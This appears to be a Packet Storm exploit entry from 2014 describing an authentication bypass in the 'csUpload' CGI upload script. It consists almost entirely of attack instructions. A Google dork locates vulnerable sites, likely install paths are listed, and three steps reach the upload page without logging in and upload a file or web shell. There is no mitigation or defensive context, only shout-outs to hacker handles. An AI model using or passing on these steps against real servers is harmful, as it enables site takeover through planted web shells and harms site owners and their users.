csUpload Authentication Bypass

2014-04-09T00:00:00
ID PACKETSTORM:126073
Type packetstorm
Reporter Satanic2000
Modified 2014-04-09T00:00:00

Description

                                        
                                            `# Exploit Title: ["csUpload Script Site" Authentication Bypass]  
# Google Dork: [CSUpload.cgi?command=]  
# Date: 4/9/2014  
# Exploit Author: Satanic2000  
# Vendor Homepage: http://www.cgiscript.net  
# Software Link: http://www.cgiscript.net/cgi-script/csNews/csNews.cgi?database=cgi.db&command=viewone&id=12  
# Version:  
# Tested on: linux  
# www.Site.com/[path]/CSUpload/CSUpload.cgi  
# [path] : /cgi-script/ or /cgi-bin/ or None  
  
# Example:  
  
# 1- http://localhost/cgi-bin/CSUpload//CSUpload.cgi?command=login  
  
# 2- Bypass Authentication http://localhost/cgi-bin/CSUpload/CSUpload.cgi  
  
# 3- Select Database Select Databases And Upload (File,Or Shell)  
  
# Special tnx S3Ri0uS . Pejvak . l3l4ck.$c0rpi0n And Other Friend  
  
`